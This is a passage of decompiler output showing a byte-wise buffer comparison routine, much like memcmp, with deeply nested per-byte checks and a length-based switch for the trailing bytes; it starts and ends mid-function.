																									__eflags = _t1270;
																									_t228 = _t1270 > 0;
																									__eflags = _t228;
																									_t1270 = (0 | _t228) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1d] & 0x000000ff) - (_t1339[0x1d] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t234 = _t1270 > 0;
																										__eflags = _t234;
																										_t1270 = (0 | _t234) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1e] & 0x000000ff) - (_t1339[0x1e] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t240 = _t1270 > 0;
																											__eflags = _t240;
																											_t1270 = (0 | _t240) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											_t1270 = (_t1353[0x1f] & 0x000000ff) - (_t1339[0x1f] & 0x000000ff);
																											__eflags = _t1270;
																											if(_t1270 != 0) {
																												__eflags = _t1270;
																												_t246 = _t1270 > 0;
																												__eflags = _t246;
																												_t1270 = (0 | _t246) * 2 - 1;
																											}
																											__eflags = _t1270;
																											if(_t1270 == 0) {
																												goto L133;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t1270 = (_t1055 & 0x000000ff) - (_t1339[0x18] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t203 = _t1270 > 0;
																								__eflags = _t203;
																								_t1270 = (0 | _t203) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x19] & 0x000000ff) - (_t1339[0x19] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t209 = _t1270 > 0;
																									__eflags = _t209;
																									_t1270 = (0 | _t209) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1a] & 0x000000ff) - (_t1339[0x1a] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t215 = _t1270 > 0;
																										__eflags = _t215;
																										_t1270 = (0 | _t215) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1b] & 0x000000ff) - (_t1339[0x1b] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t221 = _t1270 > 0;
																											__eflags = _t221;
																											_t1270 = (0 | _t221) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											goto L120;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t1270 = (_t1054 & 0x000000ff) - (_t1339[0x14] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t178 = _t1270 > 0;
																							__eflags = _t178;
																							_t1270 = (0 | _t178) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x15] & 0x000000ff) - (_t1339[0x15] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t184 = _t1270 > 0;
																								__eflags = _t184;
																								_t1270 = (0 | _t184) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x16] & 0x000000ff) - (_t1339[0x16] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t190 = _t1270 > 0;
																									__eflags = _t190;
																									_t1270 = (0 | _t190) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x17] & 0x000000ff) - (_t1339[0x17] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t196 = _t1270 > 0;
																										__eflags = _t196;
																										_t1270 = (0 | _t196) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										goto L107;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t1270 = (_t1053 & 0x000000ff) - (_t1339[0x10] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t153 = _t1270 > 0;
																						__eflags = _t153;
																						_t1270 = (0 | _t153) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0x11] & 0x000000ff) - (_t1339[0x11] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t159 = _t1270 > 0;
																							__eflags = _t159;
																							_t1270 = (0 | _t159) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x12] & 0x000000ff) - (_t1339[0x12] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t165 = _t1270 > 0;
																								__eflags = _t165;
																								_t1270 = (0 | _t165) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x13] & 0x000000ff) - (_t1339[0x13] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t171 = _t1270 > 0;
																									__eflags = _t171;
																									_t1270 = (0 | _t171) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									goto L94;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				_t1270 = (_t1052 & 0x000000ff) - (_t1339[0xc] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t128 = _t1270 > 0;
																					__eflags = _t128;
																					_t1270 = (0 | _t128) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xd] & 0x000000ff) - (_t1339[0xd] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t134 = _t1270 > 0;
																						__eflags = _t134;
																						_t1270 = (0 | _t134) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xe] & 0x000000ff) - (_t1339[0xe] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t140 = _t1270 > 0;
																							__eflags = _t140;
																							_t1270 = (0 | _t140) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0xf] & 0x000000ff) - (_t1339[0xf] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t146 = _t1270 > 0;
																								__eflags = _t146;
																								_t1270 = (0 | _t146) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								goto L81;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t1270 = (_t1353[8] & 0x000000ff) - (_t1339[8] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t103 = _t1270 > 0;
																				__eflags = _t103;
																				_t1270 = (0 | _t103) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[9] & 0x000000ff) - (_t1339[9] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t109 = _t1270 > 0;
																					__eflags = _t109;
																					_t1270 = (0 | _t109) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xa] & 0x000000ff) - (_t1339[0xa] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t115 = _t1270 > 0;
																						__eflags = _t115;
																						_t1270 = (0 | _t115) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xb] & 0x000000ff) - (_t1339[0xb] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t121 = _t1270 > 0;
																							__eflags = _t121;
																							_t1270 = (0 | _t121) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							goto L68;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t1270 = (_t1353[4] & 0x000000ff) - (_t1339[4] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t77 = _t1270 > 0;
																			__eflags = _t77;
																			_t1270 = (0 | _t77) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[5] & 0x000000ff) - (_t1339[5] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t83 = _t1270 > 0;
																				__eflags = _t83;
																				_t1270 = (0 | _t83) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[6] & 0x000000ff) - (_t1339[6] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t89 = _t1270 > 0;
																					__eflags = _t89;
																					_t1270 = (0 | _t89) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[7] & 0x000000ff) - (_t1339[7] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t95 = _t1270 > 0;
																						__eflags = _t95;
																						_t1270 = (0 | _t95) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L55;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t1270 = (_t1049 & 0x000000ff) - ( *_t1339 & 0x000000ff);
																	__eflags = _t1270;
																	if(_t1270 != 0) {
																		__eflags = _t1270;
																		_t51 = _t1270 > 0;
																		__eflags = _t51;
																		_t1270 = (0 | _t51) * 2 - 1;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		_t1270 = (_t1353[1] & 0x000000ff) - (_t1339[1] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t57 = _t1270 > 0;
																			__eflags = _t57;
																			_t1270 = (0 | _t57) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[2] & 0x000000ff) - (_t1339[2] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t63 = _t1270 > 0;
																				__eflags = _t63;
																				_t1270 = (0 | _t63) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[3] & 0x000000ff) - (_t1339[3] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t69 = _t1270 > 0;
																					__eflags = _t69;
																					_t1270 = (0 | _t69) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					goto L42;
																				}
																			}
																		}
																	}
																}
																L228:
																_t1021 = _t1270;
																goto L527;
															}
															_t1354 =  &(_t1353[_t1344]);
															_t1340 =  &(_t1339[_t1344]);
															switch( *((intOrPtr*)(_t1344 * 4 +  &M00BCF68A))) {
																case 0:
																	L227:
																	_t1270 = 0;
																	__eflags = 0;
																	goto L228;
																case 1:
																	L320:
																	__eax =  *(__edx - 1) & 0x000000ff;
																	__ecx =  *(__esi - 1) & 0x000000ff;
																	__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		__eax = 0 | __ecx > 0x00000000;
																		__ecx = (__ecx > 0) * 2 - 1;
																	}
																	goto L228;
																case 2:
																	L413:
																	__eflags =  *(__esi - 2) -  *(__edx - 2);
																	if( *(__esi - 2) ==  *(__edx - 2)) {
																		goto L227;
																	} else {
																		goto L317;
																	}
																	goto L528;
																case 3:
																	L314:
																	__eax =  *(__edx - 3) & 0x000000ff;
																	__ecx =  *(__esi - 3) & 0x000000ff;
																	__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		_t594 = __ecx > 0;
																		__eflags = _t594;
																		__eax = 0 | _t594;
																		__ecx = _t594 * 2 - 1;
																	}
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		goto L228;
																	} else {
																		L317:
																		__eax =  *(__edx - 2) & 0x000000ff;
																		__ecx =  *(__esi - 2) & 0x000000ff;
																		__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t600 = __ecx > 0;
																			__eflags = _t600;
																			__eax = 0 | _t600;
																			__ecx = _t600 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			goto L320;
																		}
																	}
																	goto L528;
																case 4:
																	L214:
																	_t1063 =  *(_t1354 - 4);
																	__eflags = _t1063 -  *(_t1340 - 4);
																	if(_t1063 ==  *(_t1340 - 4)) {
																		goto L227;
																	} else {
																		_t1270 = (_t1063 & 0x000000ff) - ( *(_t1340 - 4) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t405 = _t1270 > 0;
																			__eflags = _t405;
																			_t1270 = (0 | _t405) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 3) & 0x000000ff) - ( *(_t1340 - 3) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t411 = _t1270 > 0;
																				__eflags = _t411;
																				_t1270 = (0 | _t411) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 2) & 0x000000ff) - ( *(_t1340 - 2) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t417 = _t1270 > 0;
																					__eflags = _t417;
																					_t1270 = (0 | _t417) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 1) & 0x000000ff) - ( *(_t1340 - 1) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t423 = _t1270 > 0;
																						__eflags = _t423;
																						_t1270 = (0 | _t423) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L227;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 5:
																	L307:
																	__eax =  *(__esi - 5);
																	__eflags =  *(__esi - 5) -  *(__edx - 5);
																	if( *(__esi - 5) ==  *(__edx - 5)) {
																		goto L320;
																	} else {
																		goto L308;
																	}
																	goto L528;
																case 6:
																	L400:
																	__eax =  *(__esi - 6);
																	__eflags =  *(__esi - 6) -  *(__edx - 6);
																	if( *(__esi - 6) ==  *(__edx - 6)) {
																		goto L413;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 6) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t764 = __ecx > 0;
																			__eflags = _t764;
																			__eax = 0 | _t764;
																			__ecx = _t764 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 5) & 0x000000ff;
																			__eax =  *(__edx - 5) & 0x000000ff;
																			__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t770 = __ecx > 0;
																				__eflags = _t770;
																				__eax = 0 | _t770;
																				__ecx = _t770 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 4) & 0x000000ff;
																				__eax =  *(__edx - 4) & 0x000000ff;
																				__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t776 = __ecx > 0;
																					__eflags = _t776;
																					__eax = 0 | _t776;
																					__ecx = _t776 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 3) & 0x000000ff;
																					__eax =  *(__edx - 3) & 0x000000ff;
																					__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t782 = __ecx > 0;
																						__eflags = _t782;
																						__eax = 0 | _t782;
																						__ecx = _t782 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L413;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 7:
																	L493:
																	__eax =  *(__esi - 7);
																	__eflags =  *(__esi - 7) -  *(__edx - 7);
																	if( *(__esi - 7) ==  *(__edx - 7)) {
																		goto L314;
																	} else {
																		__eax =  *(__edx - 7) & 0x000000ff;
																		__ecx =  *(__esi - 7) & 0x000000ff;
																		__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t943 = __ecx > 0;
																			__eflags = _t943;
																			__eax = 0 | _t943;
																			__ecx = _t943 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 6) & 0x000000ff;
																			__eax =  *(__edx - 6) & 0x000000ff;
																			__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t949 = __ecx > 0;
																				__eflags = _t949;
																				__eax = 0 | _t949;
																				__ecx = _t949 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				L308:
																				__eax =  *(__edx - 5) & 0x000000ff;
																				__ecx =  *(__esi - 5) & 0x000000ff;
																				__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t582 = __ecx > 0;
																					__eflags = _t582;
																					__eax = 0 | _t582;
																					__ecx = _t582 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__eax =  *(__edx - 4) & 0x000000ff;
																					__ecx =  *(__esi - 4) & 0x000000ff;
																					__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t588 = __ecx > 0;
																						__eflags = _t588;
																						__eax = 0 | _t588;
																						__ecx = _t588 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L314;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 8:
																	L201:
																	_t1062 =  *(_t1354 - 8);
																	__eflags = _t1062 -  *(_t1340 - 8);
																	if(_t1062 ==  *(_t1340 - 8)) {
																		goto L214;
																	} else {
																		_t1270 = (_t1062 & 0x000000ff) - ( *(_t1340 - 8) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t380 = _t1270 > 0;
																			__eflags = _t380;
																			_t1270 = (0 | _t380) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 7) & 0x000000ff) - ( *(_t1340 - 7) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t386 = _t1270 > 0;
																				__eflags = _t386;
																				_t1270 = (0 | _t386) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 6) & 0x000000ff) - ( *(_t1340 - 6) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t392 = _t1270 > 0;
																					__eflags = _t392;
																					_t1270 = (0 | _t392) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 5) & 0x000000ff) - ( *(_t1340 - 5) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t398 = _t1270 > 0;
																						__eflags = _t398;
																						_t1270 = (0 | _t398) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L214;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 9:
																	L294:
																	__eax =  *(__esi - 9);
																	__eflags =  *(__esi - 9) -  *(__edx - 9);
																	if( *(__esi - 9) ==  *(__edx - 9)) {
																		goto L307;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 9) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t556 = __ecx > 0;
																			__eflags = _t556;
																			__eax = 0 | _t556;
																			__ecx = _t556 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 8) & 0x000000ff;
																			__eax =  *(__edx - 8) & 0x000000ff;
																			__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t562 = __ecx > 0;
																				__eflags = _t562;
																				__eax = 0 | _t562;
																				__ecx = _t562 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 7) & 0x000000ff;
																				__eax =  *(__edx - 7) & 0x000000ff;
																				__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t568 = __ecx > 0;
																					__eflags = _t568;
																					__eax = 0 | _t568;
																					__ecx = _t568 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 6) & 0x000000ff;
																					__eax =  *(__edx - 6) & 0x000000ff;
																					__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t574 = __ecx > 0;
																						__eflags = _t574;
																						__eax = 0 | _t574;
																						__ecx = _t574 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L307;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xa:
																	L387:
																	__eax =  *(__esi - 0xa);
																	__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
																	if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
																		goto L400;
																	} else {
																		__eax =  *(__edx - 0xa) & 0x000000ff;
																		__ecx =  *(__esi - 0xa) & 0x000000ff;
																		__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t739 = __ecx > 0;
																			__eflags = _t739;
																			__eax = 0 | _t739;
																			__ecx = _t739 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 9) & 0x000000ff;
																			__eax =  *(__edx - 9) & 0x000000ff;
																			__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t745 = __ecx > 0;
																				__eflags = _t745;
																				__eax = 0 | _t745;
																				__ecx = _t745 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 8) & 0x000000ff;
																				__eax =  *(__edx - 8) & 0x000000ff;
																				__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t751 = __ecx > 0;
																					__eflags = _t751;
																					__eax = 0 | _t751;
																					__ecx = _t751 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 7) & 0x000000ff;
																					__eax =  *(__edx - 7) & 0x000000ff;
																					__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t757 = __ecx > 0;
																						__eflags = _t757;
																						__eax = 0 | _t757;
																						__ecx = _t757 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L400;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xb:
																	L480:
																	__eax =  *(__esi - 0xb);
																	__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
																	if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
																		goto L493;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xb) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t917 = __ecx > 0;
																			__eflags = _t917;
																			__eax = 0 | _t917;
																			__ecx = _t917 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xa) & 0x000000ff;
																			__eax =  *(__edx - 0xa) & 0x000000ff;
																			__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t923 = __ecx > 0;
																				__eflags = _t923;
																				__eax = 0 | _t923;
																				__ecx = _t923 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 9) & 0x000000ff;
																				__eax =  *(__edx - 9) & 0x000000ff;
																				__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t929 = __ecx > 0;
																					__eflags = _t929;
																					__eax = 0 | _t929;
																					__ecx = _t929 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 8) & 0x000000ff;
																					__eax =  *(__edx - 8) & 0x000000ff;
																					__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t935 = __ecx > 0;
																						__eflags = _t935;
																						__eax = 0 | _t935;
																						__ecx = _t935 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L493;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xc:
																	L188:
																	_t1061 =  *(_t1354 - 0xc);
																	__eflags = _t1061 -  *(_t1340 - 0xc);
																	if(_t1061 ==  *(_t1340 - 0xc)) {
																		goto L201;
																	} else {
																		_t1270 = (_t1061 & 0x000000ff) - ( *(_t1340 - 0xc) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t355 = _t1270 > 0;
																			__eflags = _t355;
																			_t1270 = (0 | _t355) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xb) & 0x000000ff) - ( *(_t1340 - 0xb) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t361 = _t1270 > 0;
																				__eflags = _t361;
																				_t1270 = (0 | _t361) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
